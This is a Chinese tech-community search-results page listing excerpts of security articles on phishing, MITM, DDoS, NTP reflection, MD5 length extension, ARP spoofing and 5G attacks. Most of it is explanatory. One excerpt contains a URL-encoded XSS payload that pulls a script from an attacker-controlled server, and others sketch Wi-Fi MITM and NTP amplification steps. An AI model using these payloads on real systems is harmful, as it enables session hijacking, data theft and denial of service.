- 综合排序
- 最热优先
- 最新优先
- 来自专栏FreeBuf
网络攻击瞄准个人银行,谈谈5个典型攻击手段
虽然在过去几年针对银行的攻击手段变得更加复杂,但绝大多数攻击依旧依赖于用户欺骗。例如,针对银行的一种常见网络钓鱼攻击,就是将目标定向到恶意克隆的银行网站。 这一切都是为了引导用户犯错,而网络钓鱼还只是电子银行时代应该防范的攻击之一。以下介绍了黑客通过用户攻击银行的五种方式: SMS swaps攻击 短信诈骗在银行业已经非常普遍。 MITM攻击/中间人攻击 Man In-The-Middle(MITM)攻击由来已久,但非常有效,攻击者瞄准的是基础设施没有被充分保护的银行平台。 这种攻击通常用于攻击者所熟悉的组织,攻击者利用内部了解针对特定的负责付款的员工发起攻击。比如,他们可能会向会计发送一封电子邮件,表明是CFO要求他们支付一笔看似正常的款项。 以上这些攻击操作都依赖于最终的用户令牌,而银行如果MFA控件到位,攻击者将无法拿到这些令牌!
1.4K20发布于 2019-08-20 - 来自专栏安恒信息
揭密HTML 5带来的攻击手法
HTML5 是下一代的HTML,HTML5赋予网页更好的意义和结构。更加丰富的标签将随着对RDFa的,微数据与微格式等方面的支持,构建对程序、对用户都更有价值的数据驱动的Web。 基于HTML5开发的网页APP拥有更短的启动时间,更快的联网速度。本文详细介绍了HTML5的普及,带来的新的安全威胁。 利用跨站脚本攻击或浏览器地址栏注入javascript以后,Shell of the Future可进行劫持会话。 txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E 7、当用户点击之后,攻击者的IP地址将会发送给攻击者 5、该javascript代码会发送一个XMLHttpRequest请求。 6、分析返回的数据包,并把它发送到攻击者的服务器。 7、攻击者获取到公司内部站点的相关信息。
1K50发布于 2018-04-09 - 来自专栏ascii0x03的安全笔记
HTML5离线缓存攻击测试
攻击者由安装有XAMPP服务器的桥接虚拟机表示,IP为192.168.1.154。 攻击者可以访问本目录的demo_html.appcache获得缓存文件,在同名文件加入自己的恶意代码(这里是弹出hacked对话框),利用DNS欺骗、中间人等方式,这里将HOSTS文件更改为192.168.1.154 接下来,修改HOSTS文件为192.168.1.113 www.cache-test.com,模拟用户已经回到了安全的上网环境下,当用户再次访问该合法网站时,仍然出现的是上述攻击者的页面。 通过Wireshark抓包可以看到,浏览器仅仅请求了demo_html.appcache,离线缓存攻击成功。注意在实验时需要排除浏览器本身缓存的影响,仅仅刷新页面会收到服务器返回的304响应。 由于时间有限,并没有用爬虫去找使用了HTML5离线缓存的网站,仅仅做了这种攻击的验证实验,若有大家可以推荐几个来测试。 主页htm: <!
2.1K90发布于 2018-04-12 - 来自专栏重庆的技术分享区
5种类型的员工经常受到网络钓鱼攻击的攻击
现代攻击者已经有组织的 从用户及其系统破坏,转向更容易的目标。网络钓鱼,比如黑客攻击活动,将伪装成合法流量的欺诈性电子邮件发送,是主要技术。 当这封邮件看起来是来自朋友或高层管理人员的时候,员工更自然地会信任它,并被钓鱼攻击吸引住。毕竟,谁会对老板说“不”? 相关:每个企业家都需要了解的7层网络安全层 这些攻击的总成本是数十亿美元。 他们的前线角色和特权关系鼓励攻击者将他们视为可以放弃王国钥匙的无障碍目标。对助理的攻击通常以另一位执行官的请求的形式出现,通常要求审查附件或发送财务信息。 5.任何员工 事实的真相是,大规模的网络钓鱼攻击和以往一样流行。在你的公司里,从首席执行官到入门级助理,任何人都可能成为网络钓鱼攻击的对象。 拥有响应可疑电子邮件的安全策略和公司范围的备份策略也可以降低攻击风险。 了解这些用户以及攻击者可能使用的诱饵使得安全意识和教育更具针对性,有趣和有效。
1.1K20发布于 2018-08-01 - 来自专栏FreeBuf
从5月11号网易被攻击谈起:新型DDoS攻击LFA
5月11日晚上9时许,网易的大量用户发现访问网易新闻出现问题,相应的,有很多游戏用户报告说游戏掉线严重。一时间,有关“网易大楼着火”的谣传甚嚣。 图1 网易新闻客户端微博内容 这次攻击,相较于以往的DDoS攻击,官方描述比较特别:“骨干网络遭受攻击”。笔者敏锐地意识到这是最近学术界才提出的LFA攻击,攻击范例比较少。 新型的DDoS攻击:Link Flooding Attack(链路洪泛攻击) LFA,可以认为是一种新型的DDoS攻击,全称Link Flooding Attack(链路洪泛攻击)。 根据LFA的一次攻击实例,笔者推测,攻击者可能攻击了网易机房的上层交换节点或其他类似机构(甚至可能是IXP,ISP之间的交换节点)。 总结起来,LFA的攻击具有如下特点: 1.低密度流量攻击,难以检测 2.攻击成本低 3.持续久,攻击者可以不停切换攻击link 短期内解决这个问题的关键是负载均衡、加大带宽、增加链路,深层次地看,我们应该重新考虑改进我们网络的基础架构了
2.5K70发布于 2018-02-06 - 来自专栏绿盟科技研究通讯
5G安全:5G-AKA链接攻击及对策
然而,5G-AKA很容易受到来自主动攻击者的链接攻击,使用户的隐私处于危险之中。 5G-AKA协议在隐私保护方面易受链接攻击的缺陷,提出了一种基于密钥封装机制的5G-AKA改进方法来保护隐私,同时兼容现有5G标准,能够在不更换用户SIM卡、保持现有的5G服务网络部署的基础上抵御链接攻击 攻击者不仅可以跟踪高价值的目标用户,还可以获取到5G AKA会话中的SUPI,严重威胁到了5G系统的安全性。 目前在5G-AKA中已经发现了三种类型的链接攻击[2]。 如何使5G-AKA抵御链接攻击 本章主要根据5G-AKA协议遭受链接攻击的根本原因,提出了一些改进建议,使用户隐私在面对主动攻击者的链接攻击时可以得到更好的保护,在对5G-AKA协议修改做到最小的同时, 总结 本文首先介绍了5G-AKA的认证流程及其可能面临的链接攻击,然后分析了5G-AKA协议中链接攻击形成的根本原因,最后针对链接攻击介绍了5G-AKA协议的改进方法。
2.6K30编辑于 2022-11-14 - 来自专栏ascii0x03的安全笔记
HTML5离线缓存攻击测试(二)
经过昨天的测试,发现使用离线缓存的网站会被攻击。但是,不使用离线缓存的网站就真的不会受到这样的攻击么? (很郁闷相同的操作为啥有时候结果不一样,不过大部分还是造成了离线缓存攻击的效果。) 但是,百度也有https的版本,若访问https攻击实验就不会成功。 ? 既然百度可以,那么支付宝的页面呢? 不知道使用https进行离线缓存攻击会不会成功。 ? 除了百度和支付宝,还用网易的126.com做了实验。 个人认为,对于类似百度网站这样的服务器设置,会导致缓存攻击成功,感觉是浏览器实现时的一个bug。如果支付宝https能被离线缓存攻击,那么危害性还是很大的。
2.3K60发布于 2018-04-12 - 来自专栏程序员互动联盟
史上最牛的5次黑客攻击!
它执行一个不起眼的加密技术被称为前缀碰撞攻击。另外它还可以将自己从被感染的计算机自动删除并毁灭它的所有痕迹。 火焰在头五年时间里伪装成Microsoft软件更新,直到后来偶然的一次机会才在伊朗被发现。 5、 只针对伊朗核电厂的Stuxnet病毒 正如我们前面提到的第一项,事实证明,除了虚拟世界的东西,黑客同样会可以毁灭现实中的物体。
1.1K60发布于 2018-03-16 - 来自专栏FreeBuf
浅谈拒绝服务攻击的原理与防御(5) | NTP反射攻击复现
0×01 故事起因 前两天以为freebuf上的网友stream(年龄、性别不详)私信我说他在阿里云上的服务器被NTP攻击了,流量超过10G,希望我帮忙一起分析一下,复现一下攻击。 我这当代雷锋当然非常乐意了,于是我就和stream联系(勾搭)上了,今天我就详细讲一下我们一起复现NTP反射攻击的过程。 bit加上,这块对咱们没用 第三四五个bit时表示版本的,现在常用第二版,所以这里是010 剩下三个bit是模式,0未定义、1表示主动对等体模式、2表示被动对等体模式、3表示客户模式、4表示服务器模式、5表示广播模式或组播模式 然后我修改了上次发的那个攻击脚本,把NTP的payload加了180个00,做了一下测试,攻击了一下stream的阿里云服务器 ? 看看攻击效果 ? 能打出2.2G的峰值,但是跟攻击者的10G 20G差很多,可能是我带宽的原因,当然也可能是攻击脚本不完美,日后还需要继续改进才行。
4.1K50发布于 2018-02-23 - 来自专栏闪石星曜CyberSecurity
小生归一(五)md5扩展长度攻击
这里 (https://github.com/shrewdnoob/webCTF/blob/master/md5encode.py)是自己写的 python3版的md5加密脚本,可以更好的理解md5加密过程 3、攻击原理 假如我们有md5($key+$data)==md5(‘secrettest’)的值: cb08e6781ef34c8ecb06e1be269a6bdc $key=secret $data C=0x98badcfe;D=0x10325476 假设我们需要扩展添加的字符串为$add=’aadd’ 实现md5扩展长度攻击就是把初始向量改成md5(key+data)得到的最后四个向量: A=0x78e608cb 所以在我们不知道$key的时候,但是知道 加密结果’cb08e6781ef34c8ecb06e1be269a6bdc’ $key长度和$data 我们就可以进行md5扩展长度攻击 4.攻击利用 我不知道如果你是第一次是否和我一样 6、总结 弄明白了md5扩展长度攻击原理,可以帮我学到更多,学习像CBC字节翻转攻击原理会有帮助。题目练习可以找BUUCTF的[De1CTF2019]SSRF Me。
1.7K10发布于 2020-07-27 - 来自专栏数安视界
MD5哈希碰撞之哈希长度拓展攻击
哈希长度扩展攻击的条件 攻击者具有某个特定的明文 攻击者获取了这个特定明文消息的加盐哈希值 攻击者获取了盐的长度,但是不知道盐的具体内容 举一个例子,假设服务端现在有一个长度为10字节的盐,其默认的合法的明文为 md5 hash value:{}, key len:{}".format(md5_value, len(key))) 此时攻击者得到了以下数据: 明文:hello,world 加盐哈希值:95f96bd63ad51a2472b8304d4a9ffdac 比如现在攻击者通过一系列阶段,构造出: 明文:hello,worldxxxxxxxxx 验证哈希:a1b2c3d4f5g6h7j8k9l0a1b2c3d4f5g6 而服务端在收到发来的消息后,经过计算: data).hexdigest(), md5_study.get_md5(data)) 攻击实现 在正常MD5运算逻辑的基础上,当我们获取了某个证书加盐哈希后,需要: 根据这个哈希还原下一次计算的幻数 (A、B、C、D) 重新计算添加了攻击数据后的哈希值 计算传递给服务端的明文数据,使其满足: 在添加了攻击数据后,正常的加盐哈希仍然能够计算出来 添加了攻击数据后,服务端计算出来的加盐哈希与攻击者期望的一致
3K6429编辑于 2022-11-30 - 来自专栏重庆的技术分享区
注意以下5种黑客攻击小企业的方式
在过去的几年中发生了如此多的备受瞩目的黑客攻击和网络攻击,很容易陷入小企业很少成为攻击目标。毕竟,大企业可以提供更多,特别是涉及个人或敏感数据时 - 对吗? 但,大错特错呀!! 事实上,超过43%的网络攻击针对的是小型或新型企业。这有多可怕?这意味着近一半的网络攻击都是针对小型企业而不是大型企业。 更糟糕的是,60%受影响的小公司在受到严重网络攻击后的六个月内破产。 他们攻击弱势公司的方式有哪些?他们在寻找什么?你怎样才能减慢他们的进度或完全阻止他们的攻击? 勒索软件正在崛起 勒索软件或恶意软件的最新例子之一是WannaCry漏洞利用。 销售点系统 最近有几个品牌受到销售点攻击,这些攻击提取并破坏了客户和收银员用于促进交易的系统。例如,Chipotle 成为网络钓鱼骗局的受害者,该骗局使得黑客可以窃取数百万客户的信用卡数据。 原文作者:Kayla Matthews 原文地址:https://www.informationsecuritybuzz.com/articles/watch-5-ways-hackers-target-small-businesses
76420发布于 2018-08-13 - 来自专栏FreeBuf
攻击者隐藏踪迹的5种方式
以下是如今网络犯罪分子用来掩盖其踪迹的5种常见策略: 滥用不会发出警报的受信任平台 这是安全专家在2020年就已经发现的一个普遍现象,且一直持续到了今年。 4月,攻击者在一次自动攻击中滥用了GitHub Actions来攻击数百个存储库,该攻击使用GitHub的服务器和资源进行加密货币挖掘。 利用品牌价值、声誉或知名度进行上游攻击 在最近的SolarWinds漏洞之后,软件供应链安全问题可能已经引起了公众的广泛关注,但实际上,这些攻击已经上升了一段时间。 攻击者旨在将恶意代码向上游推送到与品牌相关联的受信任代码库,然后将其下游分发到最终目标:该品牌的合作伙伴、客户或用户等。 要知道,任何面向所有人开放的系统,同样地也会向攻击者开放。 而这意味着攻击者很有可能导出存储在Codecov用户的持续集成(CI)环境中的信息,最后将信息发送到Codecov基础架构之外的第三方服务器。 防范供应链攻击需要从多个方面进行努力。
1.1K20发布于 2021-07-02 - 来自专栏区块链入门
【攻击】日蚀攻击,女巫攻击,重放攻击,DDOS攻击的定义?
在日蚀攻击中,攻击者不像在女巫攻击(Sybil attack)中那样攻击整个网络,而是专注于隔离和瞄准某个特定节点。这种攻击通常会导致受害者节点接收到被操纵的、伪造的区块链视图。 分布式拒绝服务攻击方式在进行攻击的时候,可以对源IP地址进行伪造,这样就使得这种攻击在发生的时候隐蔽性是非常好的,同时要对攻击进行检测也是非常困难的,因此这种攻击方式也成为了非常难以防范的攻击。 攻击方式: 1、SYN Flood攻击 SYN Flood攻击是当前网络上最为常见的DDoS攻击,它利用了TCP协议实现上的一个缺陷。 5、HTTP Get攻击 这种攻击主要是针对存在ASP、JSP、PHP、CGI等脚本程序,特征是和服务器建立正常的TCP连接,并不断的向脚本程序提交查询、列表等大量耗费数据库资源的调用。 (5)严重时会造成系统死机; 防御原则: 尽可能地保持服务、迅速恢复服务。由于分布式攻击入侵网络上的大量机器和网络设备,所以要对付这种攻击归根到底还是要解决网络的整体安全问题。
5K30发布于 2020-09-25 - 来自专栏量子位
攻击面管理 | 5月11日TF102
5月11日,欢迎报名! 为工程师提供顶级交流平台 CCF TF第102期 时间 2023年5月11日 19:00-21:00 主题 攻击面管理 欢迎扫码了解详情报名现场参会 报名链接:https://conf.ccf.org.cn 曾就职于神州数码云科安全、神州数码云科信息、F5中国、赛门铁克等公司。 活动预告,欢迎关注并参加: TF103 5月14日 架构SIG 降本增效 架构先行(线下:北京) TF104 5月20日 研发效能SIG 软件工程的复杂性(线上) 参会说明 1、如报名后无法参加,请及时于活动开始前发送邮件申请取消 5、CCF会员免费参加,非会员99元/次,加入会员可免费参与全年20场线上活动。
41610编辑于 2023-05-12 - 来自专栏译文
保护您的企业免受黑客攻击的5个技巧
凭借恶意机器人探测网站的漏洞,有效地自动化了网络黑客的攻击。 自动化的兴起扩大了攻击者的攻击范围,使小型企业变得与 Home Depot 或 Target 一样脆弱。如今,所有在线业务都面临风险。 更具体而言,所有电子商务企业的所有者都应该注意两个弱点:SQL 注入攻击和跨站点脚本攻击(XXS)。 基于电子商务应用程序的构建方式,许多站点容易受到 SQL 注入攻击。 攻击可能持续仅仅数小时,也可能几天,而任何企业都无法承受 DDoS 攻击的风险。 这些攻击经常伴随着勒索声明,需要缴纳资金来停止 DDoS 攻击;而其它攻击可能只是一个烟幕弹,让黑客有时间探测网站的漏洞。 5. 和你的“朋友”们保持亲密 根据 Ponemon 研究所的研究,第三方提供商 - 网站托管商,支付处理商,呼叫中心,粉碎机 - 可能对信息泄漏的可能性和范围产生重大影响。
1.7K00发布于 2018-08-08 - 来自专栏ops技术分享
攻击科普:ARP攻击
一.介绍 ARP攻击的局限性 ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。 无法对外网(互联网、非本区域内的局域网)进行攻击。 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击 ,将本应该发往电脑B的数据发送给了攻击者。 同样的,攻击者向电脑B也发送一个伪造的ARP响应,告诉电脑B:电脑A的IP地址192.168.0.1对应的MAC地址是00-aa-00-62-c6-03,电脑B也会将数据发送给攻击者。 至此攻击者就控制了电脑A和电脑B之间的流量,他可以选择被动地监测流量,获取密码和其他涉密信息,也可以伪造数据,改变电脑A和电脑B之间的通信内容。
2.9K30发布于 2021-05-26 - 来自专栏FreeBuf
BT5 + wireshark玩wifi捕获和中间人攻击
(对原文PDF文档感兴趣的留邮箱,我发给你) BT5 + wireshark玩wifi数据包捕获和session注入(中间人攻击) 介绍: 主要思路是通过伪造相同名称的wifi接入点,配合发送ARP数据包 ,攻击连入伪造wifi的用户。 必备神器: 1,BT5(Backtrack操作系统) 2,虚拟机(带USB设备) 3,可联网的主机 第一步: 开BT5的terminal终端,然后输入”iwconfig” 检查无线网卡。 wlan0 channel 5” “iwconfig mon0 channel 5” 说明:参数“channel”用来选定一个单独的特殊频道。 -a 指定被攻击者的BSSID。 94:44:52:DA:B4:28这个是被攻击者的BSSID。 ?
2.1K50发布于 2018-02-02 - 来自专栏顶象技术业务安全专栏
这5个汽车组件单元最易遭到网络攻击
近日,研究机构Upstream发布了《2023年全球汽车行业网络安全报告》,报告数据显示:在过去5年中,全球汽车行业因为网络化攻击造成的损失超过5000亿美元,而近70%的汽车安全威胁由远距离的网络攻击引发 攻击者不需要在车辆附近,只要能够连接到车辆的网络系统,就可以发起攻击。 主要包括以4G/5G、WIFI等为代表的移动通信网络和以Ethernet、CAN等为代表的车内网络,也可以使用云服务器进行数据传输和处理。 恶意软件攻击风险。恶意软件攻击是指黑客通过植入恶意代码等方式,在汽车联网系统中执行恶意操作以达到破坏、抢劫等目的。例如利用漏洞进行木马攻击、勒索病毒等攻击方式。 DDoS攻击风险。 DDoS攻击是指分布式拒绝服务攻击,攻击者利用大量的计算机或其他网络设备向目标服务器或网站发动大量请求,占用目标资源使其无法正常服务。
62830编辑于 2023-03-29 - 来自专栏绿盟科技研究通讯
BlackHat2022:4G5G新型前门攻击解读
攻击者可以轻松地利用这些API缺陷找到远程命令漏洞或代码执行漏洞,进而影响数十亿4G/5G网络终端设备的正常运行。 二. 背景 API在电子信息行业的兴起注定要改变移动网络在过去的运营方式。 能力开放引发的新型前门攻击 前门(Frond Door),区别于后门,可以理解为开发者为了实现某种能力而所留下必要的入口,在5G领域中,前门是为了获取能力开放所暴露的API。 前门攻击指攻击者利用这些前门而发动的攻击,例如在5G领域,前门攻击则是指攻击者利用5G网络中暴露的API进行攻击;在设备制造领域,前门攻击是指劫持原始设备制造厂商的访问机制,对原厂编程方法进行逆向工程的攻击方式 随着5G和物联网共同快速的发展,5G网络能力开放的新特性使得更多的API被暴露,这一特点经常被用于攻击物联网设备。 4.6 详细的错误消息泄露风险 由于一些错误信息响应中描述过于详细,攻击者可以从中推断出自己需要的信息,在此前的文章5G安全:5G-AKA链接攻击及对策中,5G-AKA链接发生的根本原因也是利用目标对请求的不同错误消息响应信息
1.8K10编辑于 2023-02-22
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号